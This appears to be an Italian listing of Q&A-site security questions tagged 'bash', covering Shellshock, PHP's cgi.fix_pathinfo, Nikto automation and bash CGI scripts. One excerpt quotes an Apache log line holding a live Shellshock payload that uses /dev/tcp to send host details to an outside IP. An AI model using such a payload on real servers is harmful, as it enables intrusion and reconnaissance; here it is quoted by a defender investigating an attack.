Domande con tag 'bash'

domande con tag
2
risposte

Attivato cgi.fix_pathinfo è ancora "pericoloso" in Nginx?

In questo articolo in digitalocean.com Justin Ellingwood consiglia di disattivare cgi.fix_pathinfo : Inside, we need to find a section that configures the cgi.fix_pathinfo behavior. It will be commented out and set to "1" by de...
posta 11.01.2018 - 15:46
1
risposta

Bash Shellshock

Sto cercando di scoprire se i miei dispositivi sono vulnerabili a bash shellshock. Ho eseguito i comandi trovati su link . Sembra che i miei dispositivi siano entrambi vulnerabili a una sola delle vulnerabilità - Exploit 7 CVE-2014-6277, ma non...
posta 17.03.2015 - 13:35
1
risposta

Strana linea di log di apache [duplicato]

Ho appena trovato questa voce su uno dei miei server: 213.165.70.245 - - [17/Jun/2015:01:58:22 +0200] "GET / HTTP/1.1" 404 442 "() { :;}; /bin/bash -c \"echo 109.234.106.8/ > /dev/tcp/74.208.79.34/21; /bin/uname -a > /dev/tcp/74.208.7...
posta 17.06.2015 - 07:56
1
risposta

Perché è una pessima idea implementare misure restrittive in .bashrc?

Chiedere questo perché apparentemente ci sono più persone che sinceramente non si rendono conto solo quanto sia pessima questa idea, e voglio che ci sia un posto unico, facile da trovare, da inviare / inviare.     
posta 18.07.2015 - 05:41
1
risposta

Implicazioni sulla sicurezza dell'uso dello script Bash come shell di login SSH

Ho un'implementazione di monitoraggio abbastanza semplice, diciamo che il server di monitoraggio si collega a una destinazione tramite SSH tramite l'autenticazione della chiave e recupera le informazioni in base a uno script impostato come shell...
posta 26.11.2017 - 22:04
1
risposta

Automazione dello scanner NIKTO

Sto lavorando all'automazione NIKTO. Ho un file di testo contiene un elenco di indirizzi IP con le loro porte aperte. Ho già realizzato il nikto script. Funzionalità di script: prende gli indirizzi IP e quindi esegue nikto su di esso. Doma...
posta 10.06.2015 - 05:24
1
risposta

FCGId utilizza le variabili di ambiente? (Oppure è un possibile vettore di attacco per CVE-2014-6271 / 7169?)

Secondo Red Hat httpd (attack vector): CGI scripts are likely affected by this issue: when a CGI script is run by the web server, it uses environment variables to pass data to the script. These environment variables can be contro...
posta 25.09.2014 - 22:34
1
risposta

In che modo la patch Shellshock impedisce effettivamente il problema?

Non riesco a capire qualcosa sul bug di Shellshock - se queste funzioni ambientali (la cui dichiarazione inizia con " () ") vengono eseguite all'avvio della shell, in che modo la patch previene il problema? Possiamo ancora impostare alc...
posta 26.09.2014 - 09:29
2
risposte

Ci sono problemi di sicurezza per gli script CGI scritti in puro bash?

Sto lavorando a un progetto che userebbe bash e FastCGI per creare uno pseudo-CMS. C'è qualche tipo di problema di sicurezza a cui prestare attenzione all'interno di FastCGI stesso tramite uno script bash ben scritto (ad esempio buffer overfl...
posta 08.01.2014 - 07:02
2
risposte

Bash: Perché il sourcing di un file dovrebbe essere meno sicuro rispetto al bashing (esecuzione in un'altra sessione)?

Bash: perché l'individuazione di un file è meno sicura rispetto al bashing (esecuzione in un'altra sessione)? È il caso o ho completamente frainteso? Ho sentito nel contesto del sourcing di un sub-script da uno script master. Ad esempio, t...
posta 09.02.2018 - 17:38